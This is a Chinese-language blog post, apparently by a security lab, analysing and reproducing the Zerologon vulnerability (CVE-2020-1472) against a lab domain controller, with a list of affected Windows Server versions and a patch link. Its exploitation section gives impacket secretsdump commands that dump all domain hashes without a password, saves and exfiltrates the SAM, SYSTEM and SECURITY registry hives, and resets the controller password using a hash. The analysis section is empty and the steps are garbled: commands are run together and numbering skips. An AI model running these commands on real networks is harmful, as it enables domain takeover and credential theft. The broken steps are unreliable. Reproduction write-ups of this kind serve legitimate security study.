CVE-2020-1472 Netlogon特權(quán)提升漏洞分析及復(fù)現(xiàn)

聲明

以下內(nèi)容,均為文章作者原創(chuàng),由于傳播,利用此文所提供的信息而造成的任何直接或間接的后果和損失,均由使用者本人負(fù)責(zé),長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。

長白山攻防實(shí)驗(yàn)室擁有該文章的修改和解釋權(quán)。如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的副本,包括版權(quán)聲明等全部內(nèi)容。聲明長白山攻防實(shí)驗(yàn)室允許,不得任意修改或增減此文章內(nèi)容,不得以任何方式將其用于商業(yè)目的。

0x01漏洞背景

NetLogon遠(yuǎn)程協(xié)議是一種在Windows 域控上使用的RPC 接口,被用于各種與用戶和機(jī)器認(rèn)證相關(guān)的任務(wù)。最常用于讓用戶使用NTLM協(xié)議登錄服務(wù)器,也用于NTP響應(yīng)認(rèn)證以及更新計(jì)算機(jī)域密碼。

0x02漏洞分析

0x03利用過程

漏洞測試環(huán)境:

攻擊機(jī):10.10.10.6

域控:10.10.10.1

1.2 使用impacket工具包 secretsdump工具dump導(dǎo)出域內(nèi)所有用

hash python secretsdump.py hack.cn/DC$@10.10.10.1 -no-pass
reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.save

下載完成后進(jìn)行刪除操作

del system.savedel sam.savedel security.save
python secretsdump.py-sam sam.save-system system.save-security security.save LOCAL

1.6 通過導(dǎo)出的原NTLMhash恢復(fù)域控密碼

python reinstall_original_pw.py DC 10.10.10.1 e9d755619bd2c460cd769560584c6d0b

0x04漏洞修復(fù)

漏洞影響范圍:

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909?(Server Core installation)

Windows Server, version 2004 (Server Core installation)

https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-1472

0x05總結(jié)

CVE-2020-1472(Zerologon)是一個(gè)比較好用的域內(nèi)提權(quán)漏洞,影響Windows sever的多個(gè)版本,只要攻擊者能訪問到目標(biāo)并且知道目標(biāo)計(jì)算機(jī)名即可,在內(nèi)網(wǎng)中是一個(gè)非常嚴(yán)重的漏洞,攻擊者在利用漏洞時(shí)還會(huì)存在使域控脫域的風(fēng)險(xiǎn)。未打補(bǔ)丁機(jī)器的需要盡快修補(bǔ)。

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?長白山攻防實(shí)驗(yàn)室

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?學(xué)習(xí)最新技術(shù)知識(shí)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容